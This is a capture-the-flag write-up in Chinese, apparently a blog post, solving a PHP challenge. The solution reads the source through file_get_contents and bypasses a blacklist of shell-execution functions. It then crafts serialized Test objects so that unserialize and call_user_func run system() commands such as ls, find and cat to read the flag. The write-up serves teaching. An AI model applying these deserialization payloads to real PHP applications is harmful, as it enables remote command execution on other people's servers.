考查点
1、函数过滤
2、反序列化
打开源码,可以看到有POST传参,抓包看看
存在两个参数func和p,对参数func进行fuzz测试
发现有file_get_contents函数没有被过滤,配合第二个参数进行操作查看源码(没看源码前怎么知道参数会这样配合,蒙ing…)
func=file_get_contents&p=index.PHP
index.php源码如下
<?PHP
$disable_fun = array("exec","shell_exec","system","passthru","proc_open"
,"show_source","PHPinfo","popen","dl","eval","proc_terminate","touch"
,"escapeshellcmd","escapeshellarg","assert","substr_replace"
,"call_user_func_array","call_user_func","array_filter", "array_walk"
,"array_map","registregister_shutdown_function","register_tick_function"
,"filter_var", "filter_var_array", "uasort", "uksort", "array_reduce"
,"array_walk","array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p); //call_user_func 把第一个参数作为回调函数调用
$a= gettype($result); //返回 PHP 变量的类型
if ($a == "string") {
return $result;
} else {
return "";
}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
dIE("Hacker...");
}
}
?>
简单的流程就是
1、先传入参数,判断参数func是否包含disable_fun这个数组里面的函数
2、调用gettime方法,进而执行call_user_func函数,把func参数作为回调函数,p参数作为回调函数的参数,再根据PHP变量类型决定是否返回
3、在对象销毁时执行__destruct( )函数,再次执行gettime( )
构造脚本payload
<?php
class Test {
var $p = "ls";
var $func = "system";
}
$a=new Test;
print(serialize($a));
?>
//O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
反序列化,利用call_user_func函数进行绕过
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:20:"cat /flag_1047823620";s:4:"func";s:6:"system";}
扫一扫
2045
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
